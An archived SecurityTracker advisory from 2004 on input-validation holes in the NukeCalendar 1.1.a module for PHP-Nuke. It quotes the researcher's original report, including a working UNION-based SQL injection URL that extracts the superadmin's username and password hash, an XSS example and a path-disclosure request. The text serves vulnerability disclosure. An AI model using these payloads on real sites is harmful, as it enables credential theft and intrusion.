SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   NukeCalendar Vendors:   shiba-design.de
NukeCalendar Input Validation Holes Let Remote Users Inject SQL Commands and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1009711
SecurityTracker URL:  http://securitytracker.com/id/1009711
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 8 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 1.1.a
Description:   Several vulnerabilities were reported in NukeCalendar. A remote user can inject SQL commands and conduct cross-site scripting attacks. A remote user can also determine the installation path.

Janek Vind "waraxe" reported that NukeCalendar does not properly validate user-supplied input. A remote user can reportedly supply a specially crafted value for the 'eid' variable to inject an arbitrary SQL command on the underlying database. A demonstration exploit command to retrieve the superadmin's username and hashed password is provided:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null

It is also reported that a remote user can create a specially crafted POST request that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NukeCalendar software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]

It is also reported that a remote user can supply a specially crafted request to trigger an error message that will disclose the installation path.

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar

The report indicates that other components are affected, including 'block-Calendar.php', 'block-Calendar1.php' and 'block-Calendar_center.php'.

Impact:   A remote user can inject SQL commands to retrieve information from the database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NukeCalendar software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  vkp.shiba.de/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=19&ttitle=nukeKalender%201.1.a (Links to External Site)
Cause:   Access control error, Exception handling error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [waraxe-2004-SA#015 - Multiple vulnerabilities in NukeCalendar






{================================================================================}
{                              [waraxe-2004-SA#015]                              }
{================================================================================}
{                                                                                }
{                [ Multiple vulnerabilities in NukeCalendar v1.1.a ]             }
{                                                                                }
{================================================================================}
                                                                                                                                
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=15


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NukeCalendar v1.1.a                                
PHP-Nuke Calendar Module for PHP-Nuke
Copyright (c) 2002 by Andi (info@shiba-design.de)
http://www.shiba-design.de
Nuke Calendar is based on EventCalendar 2.0
Copyright (c) 2001 Originally by Rob Sutton     


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure:


Let's try  request like this - 

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar

and we get standard error messages, revealing the full path to the nuke engine scripting files:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php
 on line 286

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php
 on line 494
 

Another problem are blocks "block-Calendar.php", "block-Calendar1.php" and "block-Calendar_center.php":


http://localhost/nuke71/blocks/block-Calendar.php
http://localhost/nuke71/blocks/block-Calendar1.php
http://localhost/nuke71/blocks/block-Calendar_center.php

... and we get many error messages. By the way - blocks in phpnuke contain always protecting
code like this in block-Calendar.php:

if (eregi("block-Calendar2.php",$PHP_SELF)) {
    Header("Location: index.php");

    die();
}

But as we can see, software author renamed the script without correcting this protecting code. So
we can call this block script directly and it will lead to massive stream of error messages.



2. Cross-Site Scripting aka XSS:


Example request:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]

POST request is preffered because of the restrict filter against GET request in mainfile.php .



3. Sql injection:

This sql injection exploit can pull out from database any information, for example superadmin's username
and password's md5 hash:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null,null,null,null,null,null%20%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC